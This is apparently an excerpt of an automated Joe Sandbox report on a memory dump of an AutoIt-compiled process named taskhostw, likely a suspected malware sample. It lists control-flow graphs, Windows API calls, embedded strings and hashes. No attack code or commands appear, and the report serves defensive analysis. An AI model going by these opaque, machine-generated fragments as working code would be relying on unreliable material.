                                                                  • API String ID: 3942752672-1585850449
                                                                  • Opcode ID: fb02717b38d068383acec6d6266c4f33af6d9a7e03a6a385875b74b6d24feffb
                                                                  • Instruction ID: 6477b1401cad066425a7daab8065fba7ad1d2600aac63aed54dab28d6568ab32
                                                                  • Opcode Fuzzy Hash: fb02717b38d068383acec6d6266c4f33af6d9a7e03a6a385875b74b6d24feffb
                                                                  • Instruction Fuzzy Hash: 0A31D5714083156FD321EB64EC46BDBB7ECAF64300F10851EF599921D2EB70A688CB92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1438 1d558d-1d55a6 1439 1d55a8-1d55ad 1438->1439 1440 1d55c3 1438->1440 1439->1440 1441 1d55af-1d55b1 1439->1441 1442 1d55c5-1d55cb 1440->1442 1443 1d55cc-1d55d1 1441->1443 1444 1d55b3-1d55b8 call 1d8ca8 1441->1444 1446 1d55df-1d55e3 1443->1446 1447 1d55d3-1d55dd 1443->1447 1455 1d55be call 1d8f36 1444->1455 1450 1d55e5-1d55f0 call 1d2f60 1446->1450 1451 1d55f3-1d55f5 1446->1451 1447->1446 1449 1d5603-1d5612 1447->1449 1453 1d5619 1449->1453 1454 1d5614-1d5617 1449->1454 1450->1451 1451->1444 1452 1d55f7-1d5601 1451->1452 1452->1444 1452->1449 1457 1d561e-1d5623 1453->1457 1454->1457 1455->1440 1460 1d570c-1d570f 1457->1460 1461 1d5629-1d5630 1457->1461 1460->1442 1462 1d5671-1d5673 1461->1462 1463 1d5632-1d563a 1461->1463 1465 1d56dd-1d56de call 1e0d27 1462->1465 1466 1d5675-1d5677 1462->1466 1463->1462 1464 1d563c 1463->1464 1470 1d573a 1464->1470 1471 1d5642-1d5644 1464->1471 1472 1d56e3-1d56e7 1465->1472 1468 1d5679-1d5681 1466->1468 1469 1d569b-1d56a6 1466->1469 1473 1d5691-1d5695 1468->1473 1474 1d5683-1d568f 1468->1474 1475 1d56a8 1469->1475 1476 1d56aa-1d56ad 1469->1476 1479 1d573e-1d5747 1470->1479 1477 1d564b-1d5650 1471->1477 1478 1d5646-1d5648 1471->1478 1472->1479 1480 1d56e9-1d56ee 1472->1480 1481 1d5697-1d5699 1473->1481 1474->1481 1475->1476 1482 1d56af-1d56bb call 1d4856 call 1e0fdb 1476->1482 1483 1d5714-1d5718 1476->1483 1477->1483 1484 1d5656-1d566f call 1e0e48 1477->1484 1478->1477 1479->1442 1480->1483 1485 1d56f0-1d5701 1480->1485 1481->1476 1499 1d56c0-1d56c5 1482->1499 1486 1d572a-1d5735 call 1d8ca8 1483->1486 1487 1d571a-1d5727 call 1d2f60 1483->1487 1498 1d56d2-1d56db 1484->1498 1490 1d5704-1d5706 1485->1490 1486->1455 1487->1486 1490->1460 1490->1461 1498->1490 1500 1d574c-1d5750 1499->1500 1501 1d56cb-1d56ce 1499->1501 1500->1479 1501->1470 1502 1d56d0 1501->1502 1502->1498
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1559183368-0
                                                                  • Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                  • Instruction ID: 6d98379152fd86616d5d2ba9cc52cc655d8e21b6006ff26f5c7a4ed07cbb1279
                                                                  • Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                  • Instruction Fuzzy Hash: EA51AD30A00B05DBDB299FA9D8846AEB7B7AF50320F64872BF835963D1D770DD508B40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2301 1b69ca-1b69f1 call 1b4f3d 2304 1ee38a-1ee39a call 219604 2301->2304 2305 1b69f7-1b6a05 call 1b4f3d 2301->2305 2309 1ee39f-1ee3a1 2304->2309 2305->2304 2310 1b6a0b-1b6a11 2305->2310 2311 1ee3a3-1ee3a6 call 1b4faa 2309->2311 2312 1ee3c0-1ee408 call 1d0f36 2309->2312 2314 1ee3ab-1ee3ba call 214339 2310->2314 2315 1b6a17-1b6a39 call 1b6bec 2310->2315 2311->2314 2321 1ee42d 2312->2321 2322 1ee40a-1ee414 2312->2322 2314->2312 2325 1ee42f-1ee442 2321->2325 2324 1ee428-1ee429 2322->2324 2326 1ee42b 2324->2326 2327 1ee416-1ee425 2324->2327 2328 1ee448 2325->2328 2329 1ee5b9-1ee5ca call 1d2ed5 call 1b4faa 2325->2329 2326->2325 2327->2324 2331 1ee44f-1ee452 call 1b75e0 2328->2331 2339 1ee5cc-1ee5dc call 1b7776 call 1b5efb 2329->2339 2335 1ee457-1ee479 call 1b5f12 call 217492 2331->2335 2344 1ee48d-1ee497 call 21747c 2335->2344 2345 1ee47b-1ee488 2335->2345 2352 1ee5e1-1ee611 call 20fad2 call 1d0fac call 1d2ed5 call 1b4faa 2339->2352 2354 1ee499-1ee4ac 2344->2354 2355 1ee4b1-1ee4bb call 217466 2344->2355 2348 1ee580-1ee590 call 1b766f 2345->2348 2348->2335 2357 1ee596-1ee5b3 call 1b74bd 2348->2357 2352->2339 2354->2348 2364 1ee4cf-1ee4d9 call 1b5f8a 2355->2364 2365 1ee4bd-1ee4ca 2355->2365 2357->2329 2357->2331 2364->2348 2370 1ee4df-1ee4f7 call 20fa6e 2364->2370 2365->2348 2376 1ee51a-1ee51d 2370->2376 2377 1ee4f9-1ee518 call 1b7f41 call 1b5a64 2370->2377 2379 1ee51f-1ee53a call 1b7f41 call 1b6999 call 1b5a64 2376->2379 2380 1ee54b-1ee54e 2376->2380 2401 1ee53b-1ee549 call 1b5f12 2377->2401 2379->2401 2382 1ee56e-1ee571 call 217428 2380->2382 2383 1ee550-1ee559 call 20f98f 2380->2383 2390 1ee576-1ee57f call 1d0fac 2382->2390 2383->2352 2393 1ee55f-1ee569 call 1d0fac 2383->2393 2390->2348 2393->2335 2401->2390
                                                                  APIs
                                                                    • Part of subcall function 001B4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4F6F
                                                                  • _free.LIBCMT ref: 001EE5BC
                                                                  • _free.LIBCMT ref: 001EE603
                                                                    • Part of subcall function 001B6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001B6D0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 2861923089-1757145024
                                                                  • Opcode ID: f03399a0841719a8c434302e33d7b5391646d7ecb8c8548dc232ec7fbaa52653
                                                                  • Instruction ID: 79501617fc9820fa2c70e67011dcf19b9ee3d0ecf466df0b5f27b75f8a1d30d0
                                                                  • Opcode Fuzzy Hash: f03399a0841719a8c434302e33d7b5391646d7ecb8c8548dc232ec7fbaa52653
                                                                  • Instruction Fuzzy Hash: 3C919D71910659AFCF14EFA5C8919EDB7F4FF28314F10442AF816AB2A1EB30A954CF60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2405 1b35b0-1b35bb 2406 1b362f-1b3631 2405->2406 2407 1b35bd-1b35c2 2405->2407 2408 1b3620-1b3625 2406->2408 2407->2406 2409 1b35c4-1b35dc RegOpenKeyExW 2407->2409 2409->2406 2410 1b35de-1b35fd RegQueryValueExW 2409->2410 2411 1b35ff-1b360a 2410->2411 2412 1b3614-1b361f RegCloseKey 2410->2412 2413 1b360c-1b360e 2411->2413 2414 1b3626-1b362d 2411->2414 2412->2408 2415 1b3612 2413->2415 2414->2415 2415->2412
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32 ref: 001B35D4
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 001B35F5
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 001B3617
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 49fb735da23df457b3cb0c40d56088b57b4c0b261274910861f8a17b2a0434dc
                                                                  • Instruction ID: aac69688d8531bfdc27b3e6a18438cdf47e4aaea06c38d40a2f5cf46af498427
                                                                  • Opcode Fuzzy Hash: 49fb735da23df457b3cb0c40d56088b57b4c0b261274910861f8a17b2a0434dc
                                                                  • Instruction Fuzzy Hash: E71148B5910208BFDB208F68EC84AEEB7B8EF04740F015469E805D7210D3719F609760

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2416 219604-219687 call 1b5045 call 2197dd 2421 219691-219748 call 1b506b * 4 call 1b5045 call 1d588c * 2 call 1b506b call 2191b2 call 2189fc 2416->2421 2422 219689 2416->2422 2445 21974a-21975a call 1d2ed5 * 2 2421->2445 2446 21975f-219763 2421->2446 2423 21968b-21968c 2422->2423 2425 2197d4-2197da 2423->2425 2445->2423 2447 219765-2197bd call 218baf call 1d2ed5 2446->2447 2448 2197c4-2197ca call 1d2ed5 2446->2448 2459 2197c2 2447->2459 2458 2197cc-2197d2 2448->2458 2458->2425 2459->2458
                                                                  APIs
                                                                    • Part of subcall function 001B5045: _fseek.LIBCMT ref: 001B505D
                                                                    • Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198CD
                                                                    • Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198E0
                                                                  • _free.LIBCMT ref: 0021974B
                                                                  • _free.LIBCMT ref: 00219752
                                                                  • _free.LIBCMT ref: 002197BD
                                                                    • Part of subcall function 001D2ED5: HeapFree.KERNEL32(00000000,00000000), ref: 001D2EE9
                                                                    • Part of subcall function 001D2ED5: GetLastError.KERNEL32(00000000,?,001D9BA4), ref: 001D2EFB
                                                                  • _free.LIBCMT ref: 002197C5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 1bb30ac2c2529d38b76e3259ee4a4105e0745002609c4fde95a0a965d26180c8
                                                                  • Instruction ID: 098e165c58fac9e3567b26172ff645d2b892f138dead08109863b20884ddab0d
                                                                  • Opcode Fuzzy Hash: 1bb30ac2c2529d38b76e3259ee4a4105e0745002609c4fde95a0a965d26180c8
                                                                  • Instruction Fuzzy Hash: A1514EB1914258AFDF249F64DC81ADEBBBAEF58300F10049EF609A7381DB715A90CF58
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                  • Instruction ID: cdee2a324aea04eddf91a475f8e2655c03d7a5e5c280422d31d2132d31dfd5a5
                                                                  • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                  • Instruction Fuzzy Hash: F441D531A047459BDF1C8FAAC8A19AF7BA5AF483A4B24853FE85587740D770DD409B44
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: AU3!P/$$EA06
                                                                  • API String ID: 4104443479-3329588104
                                                                  • Opcode ID: fe11031e93b4c3081d6dd26b7431776d758bda515716710182230658e6b28b4c
                                                                  • Instruction ID: 04b0d2feb406c5a8d92736833fe256390c54e0a836322bd9917d5878c57268d1
                                                                  • Opcode Fuzzy Hash: fe11031e93b4c3081d6dd26b7431776d758bda515716710182230658e6b28b4c
                                                                  • Instruction Fuzzy Hash: F7415921A045586BDF259B64C8A1BFE7FB6AB15300F69C069F8829B283C739DD4487E1
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001EED92
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 001EEDDC
                                                                    • Part of subcall function 001B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B48A1,?,?,001B37C0,?), ref: 001B48CE
                                                                    • Part of subcall function 001D0911: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,001B741D,00000001,00276290,?,001B3BCD,002752F8,002752E0,?,?), ref: 001D0930
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X
                                                                  • API String ID: 3777226403-3081909835
                                                                  • Opcode ID: 68a08d54a01efac90a1ea2ab2c4a00ebc98dce3711278edbc0b83695919b3dd8
                                                                  • Instruction ID: e140ae22d89ede5995502c668accae2f350fa3ea179a43ec64a49a05efaf78e8
                                                                  • Opcode Fuzzy Hash: 68a08d54a01efac90a1ea2ab2c4a00ebc98dce3711278edbc0b83695919b3dd8
                                                                  • Instruction Fuzzy Hash: 6421C330A10698ABCB05DFD4CC45BEE7BF9AF58304F00405AE808A7282DBF459898BA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 1988441806-3962188686
                                                                  • Opcode ID: ca3c734e55d92fc8ba54844eac3b9b9130bae951de2461ae49ecd43f1ddede4a
                                                                  • Instruction ID: 03ba7e12d2739013ae87f78b5a0fee8b5f8ba3bbe0b740852af2d1dfef2210a4
                                                                  • Opcode Fuzzy Hash: ca3c734e55d92fc8ba54844eac3b9b9130bae951de2461ae49ecd43f1ddede4a
                                                                  • Instruction Fuzzy Hash: 43012D71C142587EDB28CBA8CC56EFE7BF8DB15301F00459FF552D2281E9B4E6148760
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 002199A1
                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002199B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 370ffa0c4c9c1ff72c92e561b9887c74e01a8acd8010c722bf1716cb94fd6f72
                                                                  • Instruction ID: cbed3eefd1edf530d8cfc1accba27cacfbda194f0ded204072fab8ef07261ddc
                                                                  • Opcode Fuzzy Hash: 370ffa0c4c9c1ff72c92e561b9887c74e01a8acd8010c722bf1716cb94fd6f72
                                                                  • Instruction Fuzzy Hash: 6AD05B7594030DABDB509B90FC0DF9B773CD704700F0002B1BE54910A1D97055948B91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7a21fe2aa8b1e44ef61c0c95325808f273d322f8b7d2f87e338f1a03cf1bf76
                                                                  • Instruction ID: afb63e637f572e87771f2c884e49c3c4235ac30c767995842c323125de9b5d63
                                                                  • Opcode Fuzzy Hash: e7a21fe2aa8b1e44ef61c0c95325808f273d322f8b7d2f87e338f1a03cf1bf76
                                                                  • Instruction Fuzzy Hash: 0EF16570A18311AFC714DF68C480A6ABBE5FF88314F14892EF8999B351D771E956CF82
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001B4401
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B44A6
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001B44C3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$_memset
                                                                  • String ID:
                                                                  • API String ID: 1505330794-0
                                                                  • Opcode ID: 277f236513ff12ce6ebab9c11e91d1cb230793cd24e1a7a6873020e2d687e2e9
                                                                  • Instruction ID: bf24866523b32e58b4e30442aead0a31ffe8b72e0832aa41d70e3793ff3fdb3c
                                                                  • Opcode Fuzzy Hash: 277f236513ff12ce6ebab9c11e91d1cb230793cd24e1a7a6873020e2d687e2e9
                                                                  • Instruction Fuzzy Hash: 513161709057118FD720DF24E8856DBBBF8FB59304F00492EF99A83252D7B1A954CB92
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 001D58A3
                                                                    • Part of subcall function 001DA2EB: __NMSG_WRITE.LIBCMT ref: 001DA312
                                                                    • Part of subcall function 001DA2EB: __NMSG_WRITE.LIBCMT ref: 001DA31C
                                                                  • __NMSG_WRITE.LIBCMT ref: 001D58AA
                                                                    • Part of subcall function 001DA348: GetModuleFileNameW.KERNEL32(00000000,002733BA,00000104,?,00000001,00000000), ref: 001DA3DA
                                                                    • Part of subcall function 001DA348: ___crtMessageBoxW.LIBCMT ref: 001DA488
                                                                    • Part of subcall function 001D321F: ___crtCorExitProcess.LIBCMT ref: 001D3225
                                                                    • Part of subcall function 001D321F: ExitProcess.KERNEL32 ref: 001D322E
                                                                    • Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8
                                                                  • RtlAllocateHeap.NTDLL(008D0000,00000000,00000001,00000000,?,?,?,001D0F53,?), ref: 001D58CF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: 6f0c645dcc3521e26421be4abbb87edbca10ea0fd1357cdb43ca9f056b0a9651
                                                                  • Instruction ID: 2f3fb9c6f9145f1eaf1d686451ef3dd7577dd7111adea5f7c4bfcfeca9053f80
                                                                  • Opcode Fuzzy Hash: 6f0c645dcc3521e26421be4abbb87edbca10ea0fd1357cdb43ca9f056b0a9651
                                                                  • Instruction Fuzzy Hash: 7F014136210B21EBD724677ABC42A2E735ADFA2360B00012BF501AB382CF708E409621
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00219964
                                                                  • SetFileTime.KERNEL32(00000000,?,00000000,?,?,002195F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0021997A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00219981
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  • Opcode ID: def84aaa39bd304a453a0dba4f5587bb7f46653e68c828ff4bf7d60f66bdd145
                                                                  • Instruction ID: 6e2b80033afaa0da43e23c5065ecbe50dd6b05b07ed653a583177e7f40408c76
                                                                  • Opcode Fuzzy Hash: def84aaa39bd304a453a0dba4f5587bb7f46653e68c828ff4bf7d60f66bdd145
                                                                  • Instruction Fuzzy Hash: B1E08632540314B7DB211F54FC0DFDE7B58AB05760F104220FB58690E087B119619798
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00218DC4
                                                                    • Part of subcall function 001D2ED5: HeapFree.KERNEL32(00000000,00000000), ref: 001D2EE9
                                                                    • Part of subcall function 001D2ED5: GetLastError.KERNEL32(00000000,?,001D9BA4), ref: 001D2EFB
                                                                  • _free.LIBCMT ref: 00218DD5
